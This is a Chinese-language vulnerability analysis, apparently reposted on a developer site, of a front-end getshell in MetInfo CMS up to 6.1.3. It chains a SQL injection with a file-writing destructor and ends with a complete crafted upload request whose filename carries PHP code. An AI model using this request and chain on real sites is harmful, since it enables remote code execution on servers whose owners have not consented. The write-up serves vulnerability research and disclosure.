内容简介:本漏洞需要结合前台SQL注入进行getshell。漏洞文件存在于
本漏洞需要结合前台 SQL 注入进行getshell。
漏洞分析
漏洞文件存在于 app/system/include/class/web.class.php 文件中,我们可以看到当满足条件: $_M['form']['metinfonow'] == $_M['config']['met_member_force'] 时, web 类的析构函数会将缓冲区的数据写入一个可控的文件中,其代码具体如下:
为了满足上面的条件,我们需要先看看 $_M['config']['met_member_force'] 是什么。通过搜索 met_member_force 关键字,我们可以发现其值的生成方式是通过 randStr 函数随机生成 7个 字符。具体代码如下:
针对 Metinfo6.x <= 6.1.2 的版本,我们可以利用已知的 SQL注入 漏洞(留言版处)获取 $_M['config']['met_member_force'] 的值,而 Metinfo6.1.3 的版本,也可以利用未修复的 SQL注入 漏洞(反馈处),具体漏洞细节可参考: Metinfo6.0.0-6.1.2前台注入漏洞生命线 。下图为通过注入获取 $_M['config']['met_member_force'] 的值:
接下来就是寻找 web 类的子类,因为他们都继承了父类的 __destruct 方法,我们只要找到可控制的缓冲区数据,便可完成整个攻击。通过全局搜索 extends web 关键字,我们发现有一个 uploadify 子类非常适合。该上传类不管上传操作成功与否,都会将相关信息输出(即可将数据送入缓冲区)。该类中有多个方法均可利用,我们随机选取一个 doupfile 方法来分析。
我们可以看到下图代码 第17行 直接将 $back 变量输出,我们跟进到 第15行 ,观察该变量值的来源。
从上图代码中,我们可以清晰的看到 $back 变量来源于可控的 $_M['form']['formname'] ,我们跟进对其处理的 upfile 类的 upload 方法,具体代码如下:
我们看到 第30行 代码,如果 $this->ext 类型不再数据库中,就将其返回,而如果我们将文件名设置为 <?php phpinfo();?> ,这样这段代码也会被输出到缓冲区中。接着回到我们文章开头的代码中,便可成功写入 shell 。
攻击
POST /metinfo/admin/index.php?c=uploadify&m=include&a=doupfile⟨=cn&metinfonow=qipwtxm&html_filename=1.php HTTP/1.1 Host: localhost Content-Length: 196 Origin: http://localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8tQiXReYsQYXHadW Accept: */* Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: XDEBUG_SESSION=PHPSTORM Connection: close ------WebKitFormBoundary8tQiXReYsQYXHadW Content-Disposition: form-data; name="test"; filename="<?php phpinfo();?>" Content-Type: image/jpeg test ------WebKitFormBoundary8tQiXReYsQYXHadW--
攻击流程图
最后我们再来理一下整个攻击的流程:
参考
以上所述就是小编给大家介绍的《某info <= 6.1.3前台getshell》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!
猜你喜欢:
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
